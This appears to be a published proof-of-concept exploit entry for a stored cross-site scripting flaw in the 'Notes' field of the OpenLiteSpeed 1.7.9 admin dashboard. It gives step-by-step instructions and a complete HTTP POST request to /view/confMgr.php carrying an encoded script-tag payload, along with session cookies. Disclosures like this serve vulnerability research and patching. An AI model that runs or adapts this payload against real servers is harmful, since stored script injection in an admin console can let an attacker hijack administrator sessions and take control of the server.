39 lines
No EOL
1.5 KiB
Text
39 lines
No EOL
1.5 KiB
Text
# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
|
|
# Date: 3/30/2021
|
|
# Exploit Author: cmOs
|
|
# Vendor Homepage: https://openlitespeed.org/
|
|
# Software Link: https://openlitespeed.org/kb/install-from-binary/
|
|
# Version: 1.7.9
|
|
# Tested on Ubuntu 20.04
|
|
|
|
Step 1: Log in to the dashboard using the Administrator account
|
|
Step 2: Go to Listeners > Summary > Actions (View) > Edit
|
|
Step 3: Inject XSS_Payload to "Notes" parameter
|
|
Step 4: Graceful Restart
|
|
Step 5: Trigger XSS when Administrator click on Default Icon
|
|
|
|
[POC]
|
|
|
|
POST /view/confMgr.php HTTP/1.1
|
|
Host: 127.0.0.1:7080
|
|
Connection: close
|
|
Content-Length: 163
|
|
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
|
|
Accept: text/html, */*; q=0.01
|
|
X-Requested-With: XMLHttpRequest
|
|
sec-ch-ua-mobile: ?0
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
|
|
Gecko) Chrome/89.0.4389.90 Safari/537.36
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
Origin: https://127.0.0.1:7080
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Dest: empty
|
|
Referer: https://127.0.0.1:7080/index.php
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
|
|
litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;
|
|
LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D
|
|
|
|
name=Default&ip=ANY&port=8088&reusePort=&secure=0¬e=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257 |